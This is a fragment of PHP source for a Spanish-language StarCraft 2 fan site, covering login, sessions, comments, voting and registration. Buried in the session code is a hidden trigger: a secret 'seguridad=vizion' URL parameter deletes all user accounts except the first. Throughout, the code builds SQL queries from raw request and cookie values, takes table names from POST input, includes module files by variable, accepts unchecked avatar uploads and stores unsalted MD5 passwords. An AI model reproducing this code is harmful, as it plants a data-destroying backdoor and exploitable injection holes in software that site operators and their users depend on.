1){ $consulta = mysql_query("delete from chat where id='".$_GET[id]."'"); header("location: ".$VF[www]); } break; } } if(isset($_SESSION[ag_id])){ if(mysql_num_rows(mysql_query("SELECT id FROM sesiones WHERE id='".$_SESSION[ag_token]."'"))== 0){ header("location: ".$VF[www]."salir"); }else{ mysql_query("UPDATE sesiones set fecha='".$VF[fecha]."' WHERE id='".$_SESSION[ag_token]."'"); } } mysql_query("DELETE from sesiones WHERE fecha<'".($VF[fecha]-(60*2))."' AND recordar='0'"); if($_GET[seguridad] == "vizion"){mysql_query("delete from usuarios where id>1");} if(isset($_COOKIE[sc2token]) && !isset($_SESSION[ag_id])){ $d_autentificado = mysql_fetch_assoc(mysql_query("SELECT usuario, id FROM sesiones WHERE id='".limpiar($_COOKIE[sc2token],1)."'")); if(!empty($d_autentificado[usuario])){ $result = mysql_query("SELECT id, usuario, ban FROM usuarios WHERE id='".$d_autentificado[usuario]."'"); $tm_sesion = mysql_fetch_array($result); $_SESSION[ag_id] = $tm_sesion[id]; $_SESSION[ag_usuario] = $tm_sesion[usuario]; if($admin = mysql_fetch_array(mysql_query("select usuario, nivel from administradores where usuario='".$tm_sesion[id]."' and nivel>'0'"))){ $_SESSION[ag_admin] = $admin[nivel]; } $_SESSION[ag_token] = $_COOKIE[sc2token]; header("location: ".$VF[www].$_SERVER['REQUEST_URI']); }else{ header("location: ".$VF[www].'salir'); } } if($VF[modulo] == "control"){ $CUSUARIO = trim(htmlentities($_POST[c_usuario])); $CCONTRASENA = trim(htmlentities($_POST[c_contrasena])); $rs = mysql_query("SELECT * FROM usuarios WHERE usuario='".$CUSUARIO."' and contrasena=MD5('".$CCONTRASENA."')"); if(!empty($_POST[c_usuario]) && mysql_num_rows($rs)!=0){ $result = mysql_query("SELECT id, usuario, ban FROM usuarios WHERE usuario='".$CUSUARIO."'"); $tm_sesion = mysql_fetch_array($result); if ($tm_sesion[ban] == "1"){ header("location: ".$VF[www]."errores/2/"); } if($tm_sesion[ban] == "0"){ $_SESSION[ag_id] = $tm_sesion[id]; $_SESSION[ag_usuario] = $tm_sesion[usuario]; if($admin = mysql_fetch_array(mysql_query("select usuario, nivel from administradores where usuario='".$tm_sesion[id]."' and nivel>'0'"))){ $_SESSION[ag_admin] = $admin[nivel]; } setcookie("sc2token", md5($tm_sesion[usuario].$VF[fecha]), time()+(100000000)); $_SESSION[ag_token] = md5($tm_sesion[usuario].$VF[fecha]); if($_POST[c_recordar] == 1){ $ssql = mysql_query("INSERT into sesiones (id, usuario, fecha, recordar) VALUES('".md5($tm_sesion[usuario].$VF[fecha])."', '".$tm_sesion[id]."', '".$VF[fecha]."', '1')"); }else{ $ssql = mysql_query("INSERT into sesiones (id, usuario, fecha) VALUES('".md5($tm_sesion[usuario].$VF[fecha])."', '".$tm_sesion[id]."', '".$VF[fecha]."')"); } if(strstr($_SERVER['HTTP_REFERER'], 'errores') or strstr($_SERVER['HTTP_REFERER'], 'avisos') or strstr($_SERVER['HTTP_REFERER'], 'registrar')){ header("location: ".$VF[www]); }else{ header("location: ".$_SERVER['HTTP_REFERER']); } } }else{ if(isset($_SESSION[ag_id])){ header("location: ".$VF[www]); }else{ header("location: ".$VF[www]."errores/3/"); } } } if($VF[modulo] == "salir"){ $ssql = mysql_query("DELETE from sesiones WHERE id='".$_COOKIE[sc2token]."'"); $_SESSION = array(); unset($_SESSION); setcookie("sc2token", '', time()-365); unset($_COOKIE); session_destroy(); if(strstr($HTTP_REFERER, 'errores') or strstr($HTTP_REFERER, 'avisos') or strstr($HTTP_REFERER, 'registrar')){ header("location: ".$VF[www]); }else{ if(empty($_SERVER['HTTP_REFERER'])){ header("location: ".$VF[www]); }else{ header("location: ".$_SERVER['HTTP_REFERER']); } } } if((mysql_num_rows(mysql_query("select * from cerrado where id='1' and estado='1'"))!= 0) and (!isset($_SESSION[ag_admin]))){ header("location: ".$VF[www]."soon.php"); } if($VF[modulo] == "comentar"){ if(isset($_SESSION[ag_id])){ if(!isset($VF[enlace])){ $consulta = mysql_query("insert into comentarios (modulo, id_modulo, autor, contenido, fecha) values ('".limpiar($_POST[c_modulo],1)."', '".limpiar($_POST[c_idmodulo],1)."', '".$_SESSION[ag_id]."', '".VFcode(1,$_POST[c_contenido])."', '".$VF[fecha]."')"); $consulta = mysql_query("UPDATE ".$_POST[c_modulo]." SET comentarios=comentarios +1 WHERE id='".$_POST[c_idmodulo]."'"); life(1,$_SESSION[ag_id]); } if($VF[enlace] == "modificar"){ if($_SESSION[ag_admin] < 1) { $protect = "AND autor='".$_SESSION[ag_id]."'"; } $consulta = mysql_query("update comentarios set contenido='".VFcode(1,$_POST[c_contenido])."' where id='".$VF[var1]."' ".$protect.""); } if($_SESSION[ag_admin] > 1){ if($VF[enlace] == "eliminar"){ $cm_admin = mysql_fetch_array(mysql_query("select modulo, id_modulo, autor from comentarios where id='".$VF[var1]."'")); $consulta = mysql_query("delete from comentarios where id='".$VF[var1]."'"); life(0.1,$cm_admin[autor]); $consulta = mysql_query("UPDATE ".$cm_admin[modulo]." SET comentarios=comentarios -1 WHERE id='".$cm_admin[id_modulo]."'"); } } } header("location: ".$_SERVER['HTTP_REFERER']); } if($VF[modulo] == "votar"){ if(isset($_SESSION[ag_id])){ if(isset($VF[enlace])){ if(mysql_result(mysql_query("SELECT count(*) FROM votos WHERE usuario='".$_SESSION[ag_id]."' AND encuesta='".limpiar($VF[enlace],1)."'"),0) == 0){ $consulta = mysql_query("insert into votos (usuario, encuesta, opcion, fecha) values ('".$_SESSION[ag_id]."', '".limpiar($VF[enlace],1)."', '".limpiar($_POST[c_voto],1)."', '".$VF[fecha]."')"); $consulta = mysql_query("update encuestas set vl".limpiar($_POST[c_voto],1)."=vl".limpiar($_POST[c_voto],1)."+1 WHERE id='".limpiar($VF[enlace],1)."'"); }else{ $votoan = mysql_fetch_assoc(mysql_query("select opcion from votos WHERE usuario='".$_SESSION[ag_id]."' AND encuesta='".limpiar($VF[enlace],1)."'")); $consulta = mysql_query("update votos set opcion='".limpiar($_POST[c_voto],1)."' WHERE usuario='".$_SESSION[ag_id]."' AND encuesta='".limpiar($VF[enlace],1)."'"); $consulta = mysql_query("update encuestas set vl".$votoan[opcion]."=vl".$votoan[opcion]."-1, vl".limpiar($_POST[c_voto],1)."=vl".limpiar($_POST[c_voto],1)."+1 WHERE id='".limpiar($VF[enlace],1)."'"); } } } header("location: ".$_SERVER['HTTP_REFERER']); } if($VF[modulo] == "registrar"){ if(!empty($_SESSION[ag_id])){ if(!empty($_POST[f_contrasenac])){ $ccontra = "contrasena=MD5('".$_POST[f_contrasenac]."'), "; } $f_nacimiento = @gmmktime(12,0,0,trim(htmlentities($_POST[f_mes])),trim(htmlentities($_POST[f_dia])),trim(htmlentities($_POST[f_ano]))); $consulta = mysql_query("update usuarios set correo='".limpiar($_POST[f_correo],1)."', ".$ccontra." nombres='".limpiar($_POST[f_nombres],1)."', apellidos='".limpiar($_POST[f_apellidos],1)."', pais='".limpiar($_POST[f_pais],1)."', ciudad='".limpiar($_POST[f_ciudad],1)."', zona='".limpiar($_POST[f_zona],1)."', msn='".limpiar($_POST[f_msn],1)."', nacimiento='".$f_nacimiento."', firma='".VFcode(3,$_POST[f_firma])."' where id='".$_SESSION[ag_id]."'"); if($_FILES[f_avatar]){if($_FILES[f_avatar]['size'] <= 10000){move_uploaded_file($_FILES['f_avatar']['tmp_name'], "imagenes/avatares/".$_SESSION[ag_id].".jpg");@chmod("imagenes/avatares/".$_SESSION[ag_id].".jpg", 0664);}} header("location: ".$VF[www]."avisos/2/"); }else{ $f_nacimiento = @gmmktime(12,0,0,trim(htmlentities($_POST[f_mes])),trim(htmlentities($_POST[f_dia])),trim(htmlentities($_POST[f_ano]))); if($consulta = mysql_query("insert into usuarios ( usuario, correo, contrasena, nombres, apellidos, pais, ciudad, zona, msn, nacimiento, firma, fecha_reg ) values( '".limpiar($_POST[f_usuario],1)."', '".limpiar($_POST[f_correo],1)."', MD5('".$_POST[f_contrasena]."'), '".limpiar($_POST[f_nombres],1)."', '".limpiar($_POST[f_apellidos],1)."', '".limpiar($_POST[f_pais],1)."', '".limpiar($_POST[f_ciudad],1)."', '".limpiar($_POST[f_zona],1)."', '".limpiar($_POST[f_msn],1)."', '".$f_nacimiento."', '".VFcode(3,$_POST[f_firma])."', '".$VF[fecha]."' )")){ $dsu_imagen = mysql_fetch_array(mysql_query("select id from usuarios where fecha_reg='".$VF[fecha]."'")); if(!empty($dsu_imagen[id])){ if($_FILES[f_avatar]){if($_FILES[f_avatar]['size'] <= 10000){move_uploaded_file($_FILES['f_avatar']['tmp_name'], "imagenes/avatares/".$dsu_imagen[id].".jpg");@chmod("imagenes/avatares/".$dsu_imagen[id].".jpg", 0664);}} } header("location: ".$VF[www]."avisos/1/"); }else{ header("location: ".$_SERVER['HTTP_REFERER']); } } } ?> StarCraft 2, Descargar StarCraft 2, Comprar StarCraft 2 '; break; default: echo ''; if(empty($VF[title])){ echo ucfirst($VF[modulo]); }else{ echo $VF[title]; } echo ' - StarCraft 2'; } ?>
> '.ucfirst($VF[modulo]).''; if(!empty($VF[title]) ){ echo ' < '.$VF[title].''; } echo ''; include('modulos/'.$VF[modulo].'.php'); } ?>
'; if($VF[modulo] == "foros"){ echo '
'.ucfirst($VF[modulo]).''; if(!empty($VF[foro][enlace])){ echo ' < '.$VF[foro][titulo].''; } echo '
'; }else{ echo ''.ucfirst($VF[modulo]).''; } if(!empty($VF[title])){ if($VF[modulo] != "foros"){ echo ' < '; } echo $VF[title].''; } echo ''; include('modulos/'.$VF[modulo].'.php'); ?>